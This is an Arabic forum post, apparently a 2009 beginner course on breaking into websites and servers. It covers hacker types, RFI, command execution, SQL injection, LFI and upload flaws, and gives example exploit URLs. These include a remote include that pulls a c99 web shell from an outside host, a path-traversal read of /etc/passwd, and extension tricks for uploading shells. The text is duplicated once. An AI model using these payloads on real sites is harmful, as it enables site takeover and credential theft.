bahattab
18-09-2009, 01:05 PM
الدرس الأول - الهكر وأنواعه
السلام عليكم ورحمة الله وبركاته
انشاء الله هذا أول درس من دورة إختراق المواقع والسيرفرات وهو عن مفهوم الهكر وأنواعه
=================================================
طبعا المفهوم الذي انتشر بين الناس عن معنى كلمة هكر هو المخترق أو القرصان ولاكن هذا المفهوم خطأ
الهكر هو شخص يقوم بتغير سير شيىء لصالحه عكس سير ذاك الشيىء
فمثلا لدي جهازالريموت كنترول وهو خاص بالتلفاز ولاكن اريد ان اجعله يتحكم بجهاز التكيف فما علي فهمه هو طريقة عمل جهاز الكنترول
وتغير طريقة عمله للتردد الذي يعمل عليه جهاز التكيف
والهكر ينقسم الى ثلاث أقسام :-
1- White Hat
2- Black Hat
3- Grey Hat
الـ White Hat هو الهكر الأبيض الذي يكتشف خطأ برمجي او ثغرة لكي يحمي نفسه وغيره من الإختراق أي لايحب التخريب
مايهمه هو الـ Security
على عكس الـ Black Hat فهو يستغل الثغرة لصالحه في إختراق الأخرين ولا يهمه الحماية مايهمه هو كسر الحماية والخراب
والـ Grey Hat هو مزيج من الـwhite Hat و الـBlack Hat وهو يستخدم خبرته في الإختراق لصالحه او
لحماية الأخرين او حماية نفسه
الى هنا انهي الدرس الأول من الدورة وأرجوا ان يكون منها فائده للجميع من المبتدئيين او المتقدمين
./d0n3
---------------------------------
(http://sec-r1z.com/forumdisplay.php?f=140)
الدرس الثاني (شرح أنواع الثغرات ومفاهيمها)
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثاني في الدورة وهي ((شرح أنواع الثغرات ومفاهيمها))
أنواع الثغرات وهي :
1- Remote File Inclusion إختصارها RFI
Remote Command Execution -2
SQL -3
Local File Inclution -4 إختصارها LFI
Remote Upload Vulnerability -5
امممم نبداء بشرح كلا منها http://www.atyafonline.com/vb/imgcache/3684.png
=================================================
النوع الأول هي ثغرة تسمح لك بسحب الشل من خارج الموقع الى الموقع عن طريق الرابط مثلا
كود PHP:
www.xxx.com/index.php?id=http://site.com/shell.txt?
اذا كان الملف مصاب بثغرة include سوف يتم سحب الشل عن طريق وضع رابط الشل
خلف علامة = بعد الرابط يجب ان نضع علامة "؟"
اذا كانت الثغرة شغالة سيتم سحب الشل
اممم واحد بيسألني ماهو الشل ؟؟؟
الشل يا طويل العمر هو ملف مبرمج بلغة PHP ترفعه اذا وجدت ثغرة ويسمح لك بالتحكم بالموقع كاملا كأنك صاحب الموقع وسنشرحه في الدروس القادمه
لأنه اساس الإختراق من ثغرات الـ web application
ملاحظة : ثغرات include قد شارفت على الإنقراض وبقية منها 2% فقط من جميع المواقع على الشبكة
يعني لو الثغرة كانت موجودة لو شرحت عليها مع التطبيق
=================================
الأن نروح لنوع الثاني وهو
Remote Command Execution
هاذي الثغرة تعجبني جدا وهي ثغرة تسمح لك بتنفيذ اوامر على السيرفر اوامر نظام التشغيل لينكس
مثلا
كود PHP:
www.xxxx.com/index.php?=id
ذا كانت الثغرة مصابه سوف تسمح لنا بتنفيذ الأوامر بوضع الأمر بعد علامة =
انا وضعت الأمر id وهو الأمر الذي يظهر صلاحيتي على السيرفر وانشالله نفهم اكثر في الدروس القادمه
==================================
النوع الثلاث وهو SQL بالعربي تسمى ثغرات الحقن اي انك تحقن قواعد البيانات بأوامر لتستخرج منها معلومات قيمة جداا
مثل باسورد ويوزر الأدمن المخزنة في القاعدة الخاصه بالسكريبت
وهي الثغرة الأكثر شعبية واستعمالا الأن وقد تم الإطاحه بكبار المواقع مثل موقع الكاسبر سكاي و موقع مايكرسوفت بهاذه
الثغرة و سيتم شرح استغلالها وتطبيقها بشرح مخصص لأنها ثغرة عظيمة تحتاج لفيديو او درس خاااص http://www.atyafonline.com/vb/imgcache/3684.png
وتتواجد في أكثر من لغة برمجية كـ PHP و asp
==================================
النوع الرابع وهو Local File Inclution وهاذيه الثغرة تسمح لك بقراءة ملفات على السيرفر
مثل ملف etc/passwd وهو الملف الذي يحفظ يوزرات المواقع وطريقة الإستغلال هي
كود PHP:
www.xxx.com/index.php?=../../../../../etc/passwd
وطبعا كما تعودنا بعد علامة = نضع هذا الإستغلال ../../../../../etc/passwd
ماذا تعني ../
هذي تعني خطوة للخلف اي اذا كنا على هذا المسار vb/includes ووضعنا هذا الأمر بالإستغلال ../ سوف يتغير
مسارنا لمجلد /vb/ مع الدروس القادمه سوف تفهمون انشالله كما قلت انه درس لفهم انواع ومفاهيم الثغرات
وطرق عملها
================================
النوع الخامس ولأخير وهو Remote Upload Vulnerability
وهي ثغرات مراكز رفع الملفات فبعض المرمجين الغير مباليين يسمح لك برفع امتداد php كما عرفنا انه الشل يكون ملف مبرمج
بلغة php اي امتداده ايضا php فهذا يسمح لنا برفع الشل مثلا شل بإسم c99.php
وهناك ايضا بعض مراكز التحميل التي يمكن خداعها ففي بعضي الأحيان نجد مركز رفع يسمح لك برفع امتداد
gif و jpg و rar و zip
فبذالك يمكن خذاع المركز بإعادة تسمية الشل من c99.php الى c99.php.rar او c99.php.gif
وسيتم الرفع و سأشرحه في درس مفصل مع التطبيق لووول http://www.atyafonline.com/vb/imgcache/3684.png
وبهذا ننهي الدرس لهاذا اليوم واتمنى انا اكون قد وفيت في الشرح http://www.atyafonline.com/vb/imgcache/3685.png
--------------------------------------------------
الدرس الثالث - دينامكية عمل
Remote File include
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
كود PHP:
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt
مثلا هذا الشل
كود PHP:
http://www.c99.mobi/c99.txt (http://www.c99.mobi/c99.txt)
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id
وطريقة كتابة الإستغلال هي
كود PHP:
www.site.com/index.php?id=http://www.c99.mobi/c99.txt? (http://www.c99.mobi/c99.txt?)
ع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى
الى هن ننهي الشرح http://www.atyafonline.com/vb/imgcache/3686.png
-------------------------------------
الدرس الرابع - دينامكية عمل ثغرة
Remote command execution
السلام عليكم ورحمة الله وبركاته
الشرح بالفيديو
http://www.atyafonline.com/vb/imgcache/3687.png
التحميل
كود PHP:
http://www.4shared.com/file/118513966/f32bd47b/4_online.html (http://www.4shared.com/file/118513966/f32bd47b/4_online.html)
http://www.atyafonline.com/vb/imgcache/3688.png (http://smarterfox.com/wikisearch/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%B1%D8%A7%D8%A8%D8%B9%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20command% 20execution%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8%A7 %D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%88%D 8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9%87% 20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D%0A %0D%0A%D8%A7%D9%84%D8%B4%D8%B1%D8%AD%20%D8%A8%D8%A 7%D9%84%D9%81%D9%8A%D8%AF%D9%8A%D9%88%0D%0A%0D%0A% 0D%0A%0D%0A%D8%A7%D9%84%D8%AA%D8%AD%D9%85%D9%8A%D9 %84%0D%0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0Aht tp%3A%2F%2Fwww.4shared.com%2Ffile%2F118513966%2Ff3 2bd47b%2F4_online.html%20%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D8%A7%D9%84%D8%AF%D8%B1%D8%B 3%20%D8%A7%D9%84%D8%B1%D8%A7%D8%A8%D8%B9%20%28%D8% AF%D9%8A%D9%86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8 %B9%D9%85%D9%84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remot e%20command%20execution%29%0D%0A%D8%A7%D9%84%D8%B3 %D9%84%D8%A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%8 5%20%D9%88%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84% D9%84%D9%87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA %D9%87%0D%0A%0D%0A%D8%A7%D9%84%D8%B4%D8%B1%D8%AD%2 0%D8%A8%D8%A7%D9%84%D9%81%D9%8A%D8%AF%D9%8A%D9%88% 0D%0A%0D%0A%0D%0A%0D%0A%D8%A7%D9%84%D8%AA%D8%AD%D9 %85%D9%8A%D9%84%0D%0A%0D%0A%D9%83%D9%88%D8%AF%20PH P%3A%0D%0Ahttp%3A%2F%2Fwww.4shared.com%2Ffile%2F11 8513966%2Ff32bd47b%2F4_online.html%20%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%B1%D8%A7%D8%A8%D8%B9%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20command% 20execution%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8%A7 %D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%88%D 8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9%87% 20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D%0A %0D%0A%D8%A7%D9%84%D8%B4%D8%B1%D8%AD%20%D8%A8%D8%A 7%D9%84%D9%81%D9%8A%D8%AF%D9%8A%D9%88%0D%0A%0D%0A% 0D%0A%0D%0A%D8%A7%D9%84%D8%AA%D8%AD%D9%85%D9%8A%D9 %84%0D%0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0Aht tp%3A%2F%2Fwww.4shared.com%2Ffile%2F118513966%2Ff3 2bd47b%2F4_online.html%20%0D%0A)
-------------------------------------
الدرس الخامس - دينامكية عمل ثغرة
Remote Upload Vulnerability
السلام عليكم ورحمة الله وبركاته
حملوا شباب
http://www.atyafonline.com/vb/imgcache/3687.png
كود PHP:
http://www.4shared.com/file/119101606/4a29c59/5_online.html (http://www.4shared.com/file/119101606/4a29c59/5_online.html)
http://www.atyafonline.com/vb/imgcache/3688.png (http://smarterfox.com/wikisearch/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%AE%D8%A7%D9%85%D8%B3%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20Upload%2 0Vulnerability%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8 %A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%8 8%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9% 87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D %0A%0D%0A%0D%0A%D8%AD%D9%85%D9%84%D9%88%D8%A7%20%D 8%B4%D8%A8%D8%A7%D8%A8%0D%0A%0D%0A%0D%0A%0D%0A%D9% 83%D9%88%D8%AF%20PHP%3A%0D%0Ahttp%3A%2F%2Fwww.4sha red.com%2Ffile%2F119101606%2F4a29c59%2F5_online.ht ml%20%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D8%A7%D9%84%D8%AF%D8%B1%D8%B 3%20%D8%A7%D9%84%D8%AE%D8%A7%D9%85%D8%B3%20%28%D8% AF%D9%8A%D9%86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8 %B9%D9%85%D9%84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remot e%20Upload%20Vulnerability%29%0D%0A%D8%A7%D9%84%D8 %B3%D9%84%D8%A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D 9%85%20%D9%88%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9% 84%D9%84%D9%87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8 %AA%D9%87%0D%0A%0D%0A%0D%0A%D8%AD%D9%85%D9%84%D9%8 8%D8%A7%20%D8%B4%D8%A8%D8%A7%D8%A8%0D%0A%0D%0A%0D% 0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0Ahttp%3A%2 F%2Fwww.4shared.com%2Ffile%2F119101606%2F4a29c59%2 F5_online.html%20%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%AE%D8%A7%D9%85%D8%B3%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20Upload%2 0Vulnerability%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8 %A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%8 8%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9% 87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D %0A%0D%0A%0D%0A%D8%AD%D9%85%D9%84%D9%88%D8%A7%20%D 8%B4%D8%A8%D8%A7%D8%A8%0D%0A%0D%0A%0D%0A%0D%0A%D9% 83%D9%88%D8%AF%20PHP%3A%0D%0Ahttp%3A%2F%2Fwww.4sha red.com%2Ffile%2F119101606%2F4a29c59%2F5_online.ht ml%20%0D%0A)
------------------------------------------
الدرس السادس - استغلال ثغرة
Local File Include
السلام عليكم ورحمة الله وبركاته
كود PHP:
http://www.4shared.com/file/119538069/67f32db0/6_online.html (http://www.4shared.com/file/119538069/67f32db0/6_online.html)
http://sec-r1z.com/forumdisplay.php?f=140
السلام عليكم ورحمة الله وبركاته
انشاء الله هذا أول درس من دورة إختراق المواقع والسيرفرات وهو عن مفهوم الهكر وأنواعه
=================================================
طبعا المفهوم الذي انتشر بين الناس عن معنى كلمة هكر هو المخترق أو القرصان ولاكن هذا المفهوم خطأ
الهكر هو شخص يقوم بتغير سير شيىء لصالحه عكس سير ذاك الشيىء
فمثلا لدي جهازالريموت كنترول وهو خاص بالتلفاز ولاكن اريد ان اجعله يتحكم بجهاز التكيف فما علي فهمه هو طريقة عمل جهاز الكنترول
وتغير طريقة عمله للتردد الذي يعمل عليه جهاز التكيف
والهكر ينقسم الى ثلاث أقسام :-
1- White Hat
2- Black Hat
3- Grey Hat
الـ White Hat هو الهكر الأبيض الذي يكتشف خطأ برمجي او ثغرة لكي يحمي نفسه وغيره من الإختراق أي لايحب التخريب
مايهمه هو الـ Security
على عكس الـ Black Hat فهو يستغل الثغرة لصالحه في إختراق الأخرين ولا يهمه الحماية مايهمه هو كسر الحماية والخراب
والـ Grey Hat هو مزيج من الـwhite Hat و الـBlack Hat وهو يستخدم خبرته في الإختراق لصالحه او
لحماية الأخرين او حماية نفسه
الى هنا انهي الدرس الأول من الدورة وأرجوا ان يكون منها فائده للجميع من المبتدئيين او المتقدمين
./d0n3
---------------------------------
(http://sec-r1z.com/forumdisplay.php?f=140)
الدرس الثاني (شرح أنواع الثغرات ومفاهيمها)
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثاني في الدورة وهي ((شرح أنواع الثغرات ومفاهيمها))
أنواع الثغرات وهي :
1- Remote File Inclusion إختصارها RFI
Remote Command Execution -2
SQL -3
Local File Inclution -4 إختصارها LFI
Remote Upload Vulnerability -5
امممم نبداء بشرح كلا منها http://www.atyafonline.com/vb/imgcache/3684.png
=================================================
النوع الأول هي ثغرة تسمح لك بسحب الشل من خارج الموقع الى الموقع عن طريق الرابط مثلا
كود PHP:
www.xxx.com/index.php?id=http://site.com/shell.txt?
اذا كان الملف مصاب بثغرة include سوف يتم سحب الشل عن طريق وضع رابط الشل
خلف علامة = بعد الرابط يجب ان نضع علامة "؟"
اذا كانت الثغرة شغالة سيتم سحب الشل
اممم واحد بيسألني ماهو الشل ؟؟؟
الشل يا طويل العمر هو ملف مبرمج بلغة PHP ترفعه اذا وجدت ثغرة ويسمح لك بالتحكم بالموقع كاملا كأنك صاحب الموقع وسنشرحه في الدروس القادمه
لأنه اساس الإختراق من ثغرات الـ web application
ملاحظة : ثغرات include قد شارفت على الإنقراض وبقية منها 2% فقط من جميع المواقع على الشبكة
يعني لو الثغرة كانت موجودة لو شرحت عليها مع التطبيق
=================================
الأن نروح لنوع الثاني وهو
Remote Command Execution
هاذي الثغرة تعجبني جدا وهي ثغرة تسمح لك بتنفيذ اوامر على السيرفر اوامر نظام التشغيل لينكس
مثلا
كود PHP:
www.xxxx.com/index.php?=id
ذا كانت الثغرة مصابه سوف تسمح لنا بتنفيذ الأوامر بوضع الأمر بعد علامة =
انا وضعت الأمر id وهو الأمر الذي يظهر صلاحيتي على السيرفر وانشالله نفهم اكثر في الدروس القادمه
==================================
النوع الثلاث وهو SQL بالعربي تسمى ثغرات الحقن اي انك تحقن قواعد البيانات بأوامر لتستخرج منها معلومات قيمة جداا
مثل باسورد ويوزر الأدمن المخزنة في القاعدة الخاصه بالسكريبت
وهي الثغرة الأكثر شعبية واستعمالا الأن وقد تم الإطاحه بكبار المواقع مثل موقع الكاسبر سكاي و موقع مايكرسوفت بهاذه
الثغرة و سيتم شرح استغلالها وتطبيقها بشرح مخصص لأنها ثغرة عظيمة تحتاج لفيديو او درس خاااص http://www.atyafonline.com/vb/imgcache/3684.png
وتتواجد في أكثر من لغة برمجية كـ PHP و asp
==================================
النوع الرابع وهو Local File Inclution وهاذيه الثغرة تسمح لك بقراءة ملفات على السيرفر
مثل ملف etc/passwd وهو الملف الذي يحفظ يوزرات المواقع وطريقة الإستغلال هي
كود PHP:
www.xxx.com/index.php?=../../../../../etc/passwd
وطبعا كما تعودنا بعد علامة = نضع هذا الإستغلال ../../../../../etc/passwd
ماذا تعني ../
هذي تعني خطوة للخلف اي اذا كنا على هذا المسار vb/includes ووضعنا هذا الأمر بالإستغلال ../ سوف يتغير
مسارنا لمجلد /vb/ مع الدروس القادمه سوف تفهمون انشالله كما قلت انه درس لفهم انواع ومفاهيم الثغرات
وطرق عملها
================================
النوع الخامس ولأخير وهو Remote Upload Vulnerability
وهي ثغرات مراكز رفع الملفات فبعض المرمجين الغير مباليين يسمح لك برفع امتداد php كما عرفنا انه الشل يكون ملف مبرمج
بلغة php اي امتداده ايضا php فهذا يسمح لنا برفع الشل مثلا شل بإسم c99.php
وهناك ايضا بعض مراكز التحميل التي يمكن خداعها ففي بعضي الأحيان نجد مركز رفع يسمح لك برفع امتداد
gif و jpg و rar و zip
فبذالك يمكن خذاع المركز بإعادة تسمية الشل من c99.php الى c99.php.rar او c99.php.gif
وسيتم الرفع و سأشرحه في درس مفصل مع التطبيق لووول http://www.atyafonline.com/vb/imgcache/3684.png
وبهذا ننهي الدرس لهاذا اليوم واتمنى انا اكون قد وفيت في الشرح http://www.atyafonline.com/vb/imgcache/3685.png
--------------------------------------------------
الدرس الثالث - دينامكية عمل
Remote File include
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
كود PHP:
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt
مثلا هذا الشل
كود PHP:
http://www.c99.mobi/c99.txt (http://www.c99.mobi/c99.txt)
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id
وطريقة كتابة الإستغلال هي
كود PHP:
www.site.com/index.php?id=http://www.c99.mobi/c99.txt? (http://www.c99.mobi/c99.txt?)
ع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى
الى هن ننهي الشرح http://www.atyafonline.com/vb/imgcache/3686.png
-------------------------------------
الدرس الرابع - دينامكية عمل ثغرة
Remote command execution
السلام عليكم ورحمة الله وبركاته
الشرح بالفيديو
http://www.atyafonline.com/vb/imgcache/3687.png
التحميل
كود PHP:
http://www.4shared.com/file/118513966/f32bd47b/4_online.html (http://www.4shared.com/file/118513966/f32bd47b/4_online.html)
http://www.atyafonline.com/vb/imgcache/3688.png (http://smarterfox.com/wikisearch/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%B1%D8%A7%D8%A8%D8%B9%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20command% 20execution%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8%A7 %D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%88%D 8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9%87% 20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D%0A %0D%0A%D8%A7%D9%84%D8%B4%D8%B1%D8%AD%20%D8%A8%D8%A 7%D9%84%D9%81%D9%8A%D8%AF%D9%8A%D9%88%0D%0A%0D%0A% 0D%0A%0D%0A%D8%A7%D9%84%D8%AA%D8%AD%D9%85%D9%8A%D9 %84%0D%0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0Aht tp%3A%2F%2Fwww.4shared.com%2Ffile%2F118513966%2Ff3 2bd47b%2F4_online.html%20%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D8%A7%D9%84%D8%AF%D8%B1%D8%B 3%20%D8%A7%D9%84%D8%B1%D8%A7%D8%A8%D8%B9%20%28%D8% AF%D9%8A%D9%86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8 %B9%D9%85%D9%84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remot e%20command%20execution%29%0D%0A%D8%A7%D9%84%D8%B3 %D9%84%D8%A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%8 5%20%D9%88%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84% D9%84%D9%87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA %D9%87%0D%0A%0D%0A%D8%A7%D9%84%D8%B4%D8%B1%D8%AD%2 0%D8%A8%D8%A7%D9%84%D9%81%D9%8A%D8%AF%D9%8A%D9%88% 0D%0A%0D%0A%0D%0A%0D%0A%D8%A7%D9%84%D8%AA%D8%AD%D9 %85%D9%8A%D9%84%0D%0A%0D%0A%D9%83%D9%88%D8%AF%20PH P%3A%0D%0Ahttp%3A%2F%2Fwww.4shared.com%2Ffile%2F11 8513966%2Ff32bd47b%2F4_online.html%20%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%B1%D8%A7%D8%A8%D8%B9%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20command% 20execution%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8%A7 %D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%88%D 8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9%87% 20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D%0A %0D%0A%D8%A7%D9%84%D8%B4%D8%B1%D8%AD%20%D8%A8%D8%A 7%D9%84%D9%81%D9%8A%D8%AF%D9%8A%D9%88%0D%0A%0D%0A% 0D%0A%0D%0A%D8%A7%D9%84%D8%AA%D8%AD%D9%85%D9%8A%D9 %84%0D%0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0Aht tp%3A%2F%2Fwww.4shared.com%2Ffile%2F118513966%2Ff3 2bd47b%2F4_online.html%20%0D%0A)
-------------------------------------
الدرس الخامس - دينامكية عمل ثغرة
Remote Upload Vulnerability
السلام عليكم ورحمة الله وبركاته
حملوا شباب
http://www.atyafonline.com/vb/imgcache/3687.png
كود PHP:
http://www.4shared.com/file/119101606/4a29c59/5_online.html (http://www.4shared.com/file/119101606/4a29c59/5_online.html)
http://www.atyafonline.com/vb/imgcache/3688.png (http://smarterfox.com/wikisearch/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%AE%D8%A7%D9%85%D8%B3%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20Upload%2 0Vulnerability%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8 %A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%8 8%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9% 87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D %0A%0D%0A%0D%0A%D8%AD%D9%85%D9%84%D9%88%D8%A7%20%D 8%B4%D8%A8%D8%A7%D8%A8%0D%0A%0D%0A%0D%0A%0D%0A%D9% 83%D9%88%D8%AF%20PHP%3A%0D%0Ahttp%3A%2F%2Fwww.4sha red.com%2Ffile%2F119101606%2F4a29c59%2F5_online.ht ml%20%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D8%A7%D9%84%D8%AF%D8%B1%D8%B 3%20%D8%A7%D9%84%D8%AE%D8%A7%D9%85%D8%B3%20%28%D8% AF%D9%8A%D9%86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8 %B9%D9%85%D9%84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remot e%20Upload%20Vulnerability%29%0D%0A%D8%A7%D9%84%D8 %B3%D9%84%D8%A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D 9%85%20%D9%88%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9% 84%D9%84%D9%87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8 %AA%D9%87%0D%0A%0D%0A%0D%0A%D8%AD%D9%85%D9%84%D9%8 8%D8%A7%20%D8%B4%D8%A8%D8%A7%D8%A8%0D%0A%0D%0A%0D% 0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0Ahttp%3A%2 F%2Fwww.4shared.com%2Ffile%2F119101606%2F4a29c59%2 F5_online.html%20%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D8%A7%D9%84%D8%AF%D8%B1%D8%B3%20%D8%A7%D 9%84%D8%AE%D8%A7%D9%85%D8%B3%20%28%D8%AF%D9%8A%D9% 86%D8%A7%D9%85%D9%83%D9%8A%D8%A9%20%D8%B9%D9%85%D9 %84%20%D8%AB%D8%BA%D8%B1%D8%A9%20Remote%20Upload%2 0Vulnerability%29%0D%0A%D8%A7%D9%84%D8%B3%D9%84%D8 %A7%D9%85%20%D8%B9%D9%84%D9%8A%D9%83%D9%85%20%D9%8 8%D8%B1%D8%AD%D9%85%D8%A9%20%D8%A7%D9%84%D9%84%D9% 87%20%D9%88%D8%A8%D8%B1%D9%83%D8%A7%D8%AA%D9%87%0D %0A%0D%0A%0D%0A%D8%AD%D9%85%D9%84%D9%88%D8%A7%20%D 8%B4%D8%A8%D8%A7%D8%A8%0D%0A%0D%0A%0D%0A%0D%0A%D9% 83%D9%88%D8%AF%20PHP%3A%0D%0Ahttp%3A%2F%2Fwww.4sha red.com%2Ffile%2F119101606%2F4a29c59%2F5_online.ht ml%20%0D%0A)
------------------------------------------
الدرس السادس - استغلال ثغرة
Local File Include
السلام عليكم ورحمة الله وبركاته
كود PHP:
http://www.4shared.com/file/119538069/67f32db0/6_online.html (http://www.4shared.com/file/119538069/67f32db0/6_online.html)
http://sec-r1z.com/forumdisplay.php?f=140